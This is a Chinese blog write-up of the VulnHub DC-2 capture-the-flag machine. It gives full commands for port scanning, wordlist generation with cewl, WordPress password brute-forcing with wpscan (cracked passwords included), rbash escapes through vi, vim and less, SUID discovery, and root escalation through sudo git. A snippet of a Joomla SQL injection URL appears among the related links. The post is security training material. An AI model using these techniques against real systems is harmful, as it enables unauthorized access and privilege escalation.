首页 > 其他分享 >vulnhub-DC-2

vulnhub-DC-2

时间:2023-12-15 12:56:53浏览次数:33  
标签:bin rbash shell 命令 DC 内置 sh vulnhub

DC-2

kali 192.168.43.149

DC-2 192.168.43.18

nmsp -sT --min-rate 10000 -p- 192.168.43.18

nmap -T4 -A -v -Pn 192.168.43.18

发现开放端口:80、7744

访问80端口,发现是个wordpress站点

FLAG1提示使用cewl获取爆破字典

cewl http://dc-2 -w dc2Pass.txt——将爬取的单词写入文件

猜测用户名为admin,进行爆破失败

使用wpscan获取该站点存在的用户名

wpscan --url http://dc-2 -enumerate u——获取用户名

admin、tom、jerry

wpscan --url http://dc-2 -P ./dc2Pass.txt -u jerry——爆破jerry的密码

获取jerry密码:adipiscing

获取tom密码:parturient

登录jerry账号获取flag2

提示wordpress cms利用不了的话,找其他的切入点

想到之前扫出的7744端口ssh服务

ssh tom@dc-2登录拿到shell

cat flag3.txt

显示-rbash: which: command not found

使用vi flag3.txt看到内容,大概就是提示你要切换用户

绕过rbash 得到flag4.txt,里面提示使用git提权

绕过rbash还是很多命令用不了,是命令路径出了问题

echo $PATH

image-20230605203312123

修改路径

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games 
sudo -l——查找当前用户具有root权限的命令

git提权

sudo git -p help
!/bin/bash

cd /root

cat最后的flag

这里搜索rbash限制是什么,如何绕过并提权

rbash是一种受限制的shell,是为了确保系统安全而设置的,用于限制用户的权限

rbash的限制

  • 通过 cd 来改变工作目录

  • 设置或取消环境变量: SHELL, PATH, ENV, BASH_ENV

  • 命令名中不能包含目录分隔符 ‘/’

  • 包含有 ‘/’ 的文件名作为内置命令 ‘.’ 的参数

  • hash 内置命令有 -p 选项时的文件名参数包含 ‘/’

  • 在启动时通过 shell 环境导入函数定义

  • 在启动时通过 shell 环境解析 SHELLOPTS 的值

  • 使用 >,>|, <>, >&, &>, >> 等重定向操作符

  • 使用 exec 内置命令

  • 通过 enable 内置命令的 -f 和 -d 选项增加或删除内置命令

  • 使用 enable 内置命令来禁用或启用 shell 内置命令

  • 执行 command 内置命令时加上 -p 选项

  • 通过 set +r 或 set +o restricted 关闭受限模式

rbash逃逸

利用系统常见应用

1.ftp

2.more

3.less

less filename
: + !/bin/sh

4.man

5.vi

原理:
vi filename
:!/bin/sh
获取shell

实操:
通过设置变量绕过‘\’的限制
vi filename
:set shell=/bin/sh
:shell

6.vim

原理:
vim filename
:!/bin/sh
获取shell

实操:
通过设置变量绕过‘\’的限制
vim filename
:set shell=/bin/sh
:shell
BASH_CMDS[a]=/bin/sh;a

suid提权

SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

查找具有root权限的suid文件


find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

git提权

sudo git help config
!/bin/bash或者!'sh'


sudo git -p help
!/bin/bash

标签:bin,rbash,shell,命令,DC,内置,sh,vulnhub
From: https://www.cnblogs.com/q1stop/p/17903137.html

相关文章

  • vulnhun-DC-3
    dc-3kali:192.168.43.149dc3:192.168.43.61只开放了80端口sudonmap--script=vuln192.168.43.61漏洞扫描发现一个sql注入感觉有价值joomla3.7.0有sql注入漏洞http://192.168.43.61/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,......
  • vulnhub-prime-1
    vulnhubprime-1端口扫描开的端口:80、22扫描服务、操作系统、用默认脚本进行漏扫扫描80端口目录主要看.php、.txt、.html、.zipsudogobusterdir-uhttp://192.168.57.136-x.php,.txt,.zip,.html找到了:image.php、index.php、secret.txt以及一些wordpress的东西看secr......
  • vulnhub-oscp
    vuln-oscp主要是熟悉收集信息思路以及工具使用先发现主机:nmap-sn192.168.229.0/24目标ip:192.168.229.143扫描端口:nmap-sT--min-rate10000-p-192.168.229.143nmap-sU--min-rate10000-p-192.168.229.143Nmapscanreportfor192.168.229.143Hostisup(0.016......
  • vulnhub-wp Bob 1.0.1
    ......
  • DC-1
    vulnhubDC-1tmuxkali命令窗布局tmuxsplit-window——划分上下两个窗格tmuxsplit-window-h——划分左右两个窗格先kali用nmap探测ipkali的ip:192.168.43.149由于靶机用虚拟机搭建,它和kali在同一网段nmap扫描:1.nmap-sP192.168.43.0/24或者使用arp-scan-l探测该网段......
  • vulnhub-MoneyBox
    MoneyBox渗透测试日常练习0x01信息收集一、主机扫描kali有很多工具可以扫描存活主机,像fping,我这里偷一下懒,用nmap直接扫。扫到一个192.168.56.102的主机,开启80,21,22端口。先来访问一下80端口吧。页面上没什么可用信息,继续信息收集。二、遍历目录[14:29:07]301-......
  • vulnhub CH4INRULZ靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.151查看端口服务nmap-A-sV-p21,22,80,801121端口ftp没有有效信息,所以重点在80,80112.漏洞挖掘开始网站浏览没找到有用信息,开始网站目录搜索(因为默认为80端口,所以我们要扫描8011端口)dirbht......
  • DC电源模块:为您的电子设备提供稳定可靠的能量
    DC电源模块:为您的电子设备提供稳定可靠的能量BOSHIDADC电源模块是一种电子设备,用于为其他电子设备提供稳定可靠的直流电能。它通常由一个输入端,一个输出端和一些内部电路组成。输入端通常接收来自交流电源或其他电源的电能,经过内部电路的处理后,以所需的稳定电压输出到输出端,供其......
  • vulnhub CH4INRULZ靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.151查看端口服务nmap-A-sV-p21,22,80,801121端口ftp没有有效信息,所以重点在80,80112.漏洞挖掘开始网站浏览没找到有用信息,开始网站目录搜索192.168.42.151/api/dirbhttp://192.168.42.151......
  • vulnhub-wp Billy Madison
    ......